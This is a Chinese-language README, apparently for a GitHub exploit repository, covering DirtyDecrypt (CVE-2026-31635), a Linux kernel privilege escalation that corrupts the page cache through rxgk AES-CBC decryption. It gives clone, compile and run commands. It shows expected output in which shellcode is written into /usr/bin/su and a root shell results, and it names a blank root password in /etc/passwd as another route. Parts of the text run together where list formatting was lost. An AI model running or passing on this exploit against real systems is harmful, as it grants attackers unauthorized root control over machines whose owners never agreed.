Linux 内核本地权限提升(通过 RXGK 页面缓存损坏)
DirtyDecrypt(CVE-2026-31635)是 Linux 内核 rxrpc 子系统(特别是 rxgk 组件)中的一个本地权限提升漏洞。
它滥用了 AES-CBC 解密过程中缺失的写时复制(COW)检查,允许非特权用户损坏页面缓存并实现任意文件写入,从而获得 root 权限。
/etc/passwd(空白 root 密码)CONFIG_RXGK=y)CONFIG_RXGK=n 的内核CONFIG_RXGK 的 Linux 内核AF_RXRPC 套接字keyctl 工具(用于 rxrpc 密钥)git clone https://github.com/0xBlackash/DirtyDecrypt.git
cd DirtyDecrypt
gcc -O2 -static -pthread CVE-2026-31635.c -o DirtyDecrypt
sudo ./DirtyDecrypt
预期的成功输出:
=== rxgk pagecache write (DirtyDecrypt) ===
uid=1000 euid=1000
[*] writing shellcode to /usr/bin/su (96 bytes from offset 0)
[========================================] 100% (XXX/96, YYYY fires)
[*] XXX fires in Z.Zs
[*] exec /usr/bin/su
[*] restore: cp /tmp/.su_12345 /usr/bin/su
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#
DirtyDecrypt/
├── CVE-2026-31635.c # 主要漏洞利用程序
├── README.md # 本文件
├── Makefile # 可选
└── exploit.log # 可选的输出日志
AF_RXRPC 套接字 + splice() 强制将页面缓存页面送入 RXGK 解密路径skb_cow_data() 的原位 AES-CBC 解密/etc/passwd)此漏洞利用程序仅用于教育和授权安全测试。
在未经授权的系统上使用属于违法行为。
⭐ 如果对你有帮助,请给仓库点个星!
为研究社区用心制作 ❤️